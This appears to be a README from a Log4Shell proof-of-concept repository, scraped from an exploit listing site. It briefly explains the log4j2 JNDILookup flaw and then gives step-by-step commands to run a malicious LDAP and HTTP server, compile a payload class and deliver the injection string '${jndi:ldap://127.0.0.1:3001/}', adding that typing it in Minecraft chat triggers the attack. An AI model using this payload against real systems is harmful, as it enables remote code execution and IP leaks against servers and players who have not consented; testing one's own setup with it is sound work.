Share
## https://sploitus.com/exploit?id=AB69B67E-5780-5CEE-BF06-3FE86422F0AC
# log4j2-exploits


https://user-images.githubusercontent.com/37479424/145661983-131eb84a-9ac5-4014-9f6b-10b69d8d7cf4.mp4


This fundamental vulnerability was reported by [CVE-2018-3149](https://nvd.nist.gov/vuln/detail/CVE-2018-3149) and patched by [this article. (8u121 Release Notes)](https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)


However, the logging library for java called log4j2 had [JNDILookup](https://github.com/apache/logging-log4j2/blob/20f9a97dbe5928c3b5077bcdd2a22ac92e941655/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java), which allowed access to protocols such as LDAP, which allowed code injection in older java versions.

Patched versions of java can prevent code injection, but `JNDILookup` makes request to ldap server, which can lead to IP leaks.

The solution is to update **Java** and **log4j2** versions.

## Running
0. Install requirements
```
cd http-server && npm install
cd ldap-server && npm install
```
1. run `http-server` and `ldap-server` both
```
cd http-server && node index.js
cd ldap-server && node index.js
```
2. Compile Main.java
```bash
# This will generate Main.java - required to code injection.
javac Main.java
```
3. Start jvm with parameters
```bash
# You can still use log4j-client in repo for internal testing.
cd log4j-client
gradlew jar
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar [yourJar].jar
```
4. Send `${jndi:ldap://127.0.0.1:3001/}` to any payloads.
(In minecraft, just chatting this will work if exploits are working.)

## References
- https://github.com/apache/logging-log4j2/pull/608
- https://www.lunasec.io/docs/blog/log4j-zero-day/

## License
CC0